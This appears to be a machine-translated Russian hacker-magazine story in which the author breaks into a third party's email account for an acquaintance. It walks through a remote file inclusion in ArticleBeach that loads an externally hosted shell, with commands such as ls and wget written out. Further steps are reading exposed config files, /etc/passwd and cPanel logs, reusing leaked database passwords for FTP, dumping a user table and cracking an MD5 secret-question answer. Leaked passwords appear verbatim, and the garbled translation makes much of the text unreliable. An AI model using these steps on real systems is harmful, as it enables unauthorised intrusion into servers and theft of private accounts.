|
It so happened that I never took a break for washing.
But here came a tempting offer
From one acquaintance, who desperately needed access to a single soap.
The soap itself was located on a small postal * .co.uk.
The acquaintance tried to brute the soap, but it did not bring any result and he turned to me.
At first, I looked through the postman myself.
In addition to the login / password box, everything is solid html.
I tried the form of entering the password for Sql-injection, but the quotes were filtered.
Server: Apache / 1.3.34 (Unix) PHP / 5.0.5 mod_auth_passthrough / 1.8 mod_log_bytes / 1.2 mod_bwlimited / 1.4 FrontPage / 5.0.2.2635 mod_ssl / 2.8.25 OpenSSL / 0.9.7a
Open ports with services were also not happy.
I decided to check if someone else was hanging out.
It turned out that a few dozen sites are listed for this ip.
I went through them, the only phpBB was patched, so none of the exploits worked.
And then I came across the ArticleBeach product www.articlebeach.com.
The first query:
Http: //www.***.com/index.php? Page = http: //durito.narod.ru/sh&cmd=ls%20-lpa
Gave me a list of server files.
In vain programmers ArticleBeach ate their bread and butter.
I climbed the site I found another bug, kindly left by the developers of ArticleBeach,
In the directory / includes / any user can view the file config.inc as follows:
A sample file is taken from the developer's website ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
Global $ _cn;
Global $ dbserver;
Global $ db;
Global $ dbuser;
Global $ dbpass;
// mysql database server, login, password & Database name
$ Dbserver = "localhost";
$ Database_connect = "article_art";
$ Dbuser = "article_jer";
$ Dbpass = "aaaaa";
$ Connect = mysql_connect ($ dbserver, $ dbuser, $ dbpass)
Or die ("Could not connect to MySQL");
Mysql_select_db ($ database_connect, $ connect);
?>
As you already understood this is the details of access to the server database.
Unfortunately in my case, the password for the database did not go to the FTP,
Which you can not say about other sites where the product from ArticleBeach is.
I had to pick the server through external inkludu.
Having opened / etc / passwd, I could not find the name of the mailer I needed,
Logins of users and domain names of sites did not match.
But it was possible to browse the user's web-directories: / home / * / public_html /
Already I wanted to start dulling everyone through the list, but decided to check the accounting.log file,
Which stores logins and domain names on cpanel.
And I got the list of domain names.
I chose the right one and began to study the web directory.
Quickly found in the source codes the access to the MySQL database:
'Database' => '*** _ themail', // Name of your MySQL database
'Username' => '*** _ postman', // The username and password that
'Password' => 'jkretj3h45j'
The password again did not go to the ftp.
It remains only to be attached to the database.
It was necessary to look for a writeable directory or file.
Again, thanks to the developers of ArticleBeach who took care of their product about the directory / backup / with the rights drwxrwxrwx.
Http: //www.***.com/index.php? Page = http: //durito.narod.ru/sh&cmd=wget -O backup / sql.php http://durito.narod.ru/sql. Php
And FIG., The same with GET, links, fetch, lynx.
Later I learned that wget and GET were disabled by PHP Secure, links, fetch and lynx were not available.
Continued internal inspection of the hoster's sites.
He tried a few passwords to DB, but they did not come to the FTP again, all the passwords represented a multi-character abracadabra.
And suddenly the Taiwanese website, intuition prompted to check it and here it is - the password for accessing the database - anahol !!!
To the FTP, the pass passes and the script to work with the DB from rst.void.ru is flooded.
To the database, I find the required table and dump it.
And here is the treasured soap, the password is really encrypted MD5,
But this business is fixable, though long and dreary.
But first I decided to check the hash at http://md5.rednoize.com/, but the pass
Was not found, and I was already ready for a long search, but then noticed that the answer to the secret question is also coded in MD5.
I pierce the secret question on md5.rednoize.com and here it is: Cheung !!!
I go not a postman and answer a secret question.
I'm offered to enter a new password and confirm it.
Checkmate!
And my friend gets access to the coveted soap, it's unforgettable for me to roll out the beer.
And I retire it eagerly to absorb.
Published on www.xakep.ru
Your bug Durito.
_________________
EAT THE RICH!
|
Comments
When commenting on, remember that the content and tone of your message can hurt the feelings of real people, show respect and tolerance to your interlocutors even if you do not share their opinion, your behavior in the conditions of freedom of expression and anonymity provided by the Internet, changes Not only virtual, but also the real world. All comments are hidden from the index, spam is controlled.